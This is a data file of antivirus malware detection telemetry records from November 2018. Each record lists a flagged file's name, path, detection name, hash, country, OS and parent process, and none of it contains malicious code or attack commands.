  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{437149C2-7CB7-40D9-B0F5-9D418878CB4F}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='b47a6f388e42623497fad3ddc07e1ee59e38ae820b13b300479dd377d4b2594d', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\ilchxgjadly\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cjgjvlpo.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\cJGjvlPo.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mau lýl ịch trích ngang.exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\Mau lýl ịch trích ngang.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='c67dfb62ab11a84d52a30b3faf2194c9a8922ec55c681dc2e574787dbf624f5a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093604-9e58ac94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093604-9E58AC94', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:36:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='disabili.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\SCHEDE CORSI SOCIOSANITARI\\DISABILI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:16:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='initwain.exe', filepath='C:\\Program Files\\ScanSoft\\PaperPort\\initwain.exe', filesize=116000, name='W32/Infector.Gen.#M300.#R7863'), hash='d04b6016946a3a7495aad8bbba344df6f8fb5336e3f3a54f6c4ece068d6a6255', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:44:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r5feaus', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$R5FEAUS', filesize=64000, name='W97M/Agent.73359286.#M1.#R1'), hash='a82256df945c493b85ca0536dd2b9041b260ac517079eefa5c953e7b2cb6a7d3', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T16:36:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='proposte brevi sanitarie.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SOCIO SANITARI\\PROPOSTE BREVI SANITARIE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145935-87aa1898', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-145935-87AA1898', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:59:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uepdorimdg.bat', filepath='E:\\uepdorimdg.bat', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T03:29:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b5tclient.exe', filepath='C:\\Users\\X\\AppData\\Local\\B5T\\6.0.5.7\\B5TClient.exe', filesize=904000, name='Adware/Bang5Mai.IE.#M1.#R1'), hash='bc52336fc528d61dc9b9543f652eb7e1dc4c4263e3dd434d26548fed3f4ae3f6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T15:57:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154641-d35d8c6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154627-D114C92D\\AVSCAN-20181101-154641-D35D8C6D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151808-5cedc638', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151808-5CEDC638', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:18:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\u3lbjfdjvys\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540976535.5bd96f97793ba', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Emtak\\803345105.exe', parentsize=670720, timestamp='2018-11-01T00:24:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\bmeqqq2i0g4\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:05:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-164147-842e8eeb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-163706-4CB2CFCA\\AVSCAN-20181101-164147-842E8EEB', filesize=192000, name='Adware/Elex.umebz.#M1.#R1'), hash='bf33a2fa1417e9e761302b0d0f29c355a3841a18117dadb6085389763bbf5f4d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:41:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='360fsflt.sys', filepath='C:\\Program Files (x86)\\360\\360Safe\\deepscan\\360FsFlt.sys', filesize=444000, name='TR/Rootkit.Gen.#M300.#R3885'), hash='f47a1363c4838fe1adf19353ffe24ea8a53a377ed976e562d1683e4371cd43eb', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:26:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150848-f1a080a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150848-F1A080A6', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:08:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{3B9E88D2-9758-44D3-86CB-1997B79D85E1}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ca57942d852ffcdd4a83d3b3ebdbcf3a03f24273ff60857b276c0e568232abb1', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-195124-c2673e04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-195124-C2673E04', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:51:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autoit3.exe', filepath='\\\\?\\D:\\اسلاميات\\Skypee\\AutoIt3.exe', filesize=640000, name='W32/Sality.AT.#M1.#R1'), hash='6a85ffd5b6373b3ba246e408872b7007d0904cf2023a6e5cbeb9b324ea0f2198', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:24:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nifel', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nifel', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='592052d52cee31b744f49919df3d9d4f6fe11e7a6f5d6b1ba6a08a660ae6feb4', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:43:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsc70E9.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\EnigmaSoft\\SpyHunter\\ShKernel.exe', parentsize=9872688, timestamp='2018-11-04T08:40:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172010-ac199c0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-172010-AC199C0E', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:20:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194315-2eda8f57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae037767\\AVSCAN-20181104-193811-1B7DF269\\AVSCAN-20181104-194315-2EDA8F57', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:43:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-062407-da4dae4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_63d5acda\\AVSCAN-20181105-060511-39D500A1\\AVSCAN-20181105-062407-DA4DAE4B', filesize=256000, name='TR/Crypt.XPACK.ckfuy.#M1.#R1'), hash='1055f1dca708d2d3846f0e02be141bb43dbb0237761b6d64b20e27290e55d94f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:24:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='$rxpzzaa.exe', filepath='\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-2374665613-4122308070-3931104648-1001\\$RXPZZAA.exe', filesize=3264000, name='HEUR/AGEN.1004359.#M1.#R1'), hash='2c9bf34eceb54e543f267565014c7d108e6acebcecea3a6b4228ff5650e6c77b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:00:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T07:40:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='201136957.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\201136957.exe', filesize=384000, name='HEUR/AGEN.1005124.#M1.#R1'), hash='06c39f81fc1037e75a0a2895981d584f6facb5a355f744d79154a57d41edff89', metadata=Row(cmdline='\\\\\\/DB', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T20:11:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wisper.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-2614866295-1031061034-537828049-1000\\$R7VE1BY.tmp\\Wisper.exe', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T19:01:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe748_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe748 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T23:58:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ikuwy.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\ikuwy.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='893cc7654068ec925e1a7d0e19b41a6c28af21c496081bfcd35113bd566566b9', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:03:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\tmp4301983\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:06:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132115-448f37c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132115-448F37C3', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:21:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T18:49:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001441-7bbcfe41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001441-7BBCFE41', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:44:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T06:55:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='instmsiw.exe', filepath='F:\\FOTO_FOTO\\2003\\Foto_dll\\instmsiw.exe', filesize=640000, name='W32/Ramnit.C.#M1.#R1'), hash='487ccdcf7f8c760d5d0b13f6da635b329edc3e4486a4867721dda56ca7bb0cbc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T20:23:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:04:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T02:45:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-193149-29115365', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-193149-29115365', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T18:31:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:49:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='D:\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\msoxh3.zip\\\\\\"', country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1500248, timestamp='2018-11-04T20:12:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\Drivers Rodolfo\\Intel USB 3.0 Driver\\Setup.exe', filesize=1024000, name='W32/Stanit.#M1.#R1'), hash='43c78f49715d2f67d40bfe010a3d9d81a7ff22eeca4f82b9a24d8edd360f8b21', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:29:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:44:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xcoresys.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\WinSys\\xcoresys.exe', filesize=512000, name='TR/Kryptik.xzcry.#M1.#R1'), hash='0d50249fa32ba88699979e3dd5cc4d34226f9206f8315c5a8ad4261a648834b0', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:38:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='libcr64.dll', filepath='\\\\?\\C:\\Windows\\TEMP\\ae7f8f31\\libcr64.dll', filesize=128000, name='TR/AD.CoinMiner.eukdq.#M1.#R1'), hash='726a9f478aaed66f0e4168594f2662198e8856e7e0f4e79085cff7c397dcc083', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T09:25:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-191602-364d1d60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57498009\\AVSCAN-20181104-191426-2464F873\\AVSCAN-20181104-191602-364D1D60', filesize=1280000, name='HEUR/AGEN.1010606.#M1.#R1'), hash='71854868d741609487bba7e1145ee045e3a62fdfd0ae26b06fc75fc27a2c7ad3', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:16:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Neshta.A.#M1.#R1'), hash='6f89e7e102f825264049fb2af1bce6683c799807cf5520697777232a3d589fd1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\WiseRegistryCleaner\\Activator.exe', parentsize=684032, timestamp='2018-11-04T21:42:55Z'), dt=datetime.date(2018, 11, 4)),
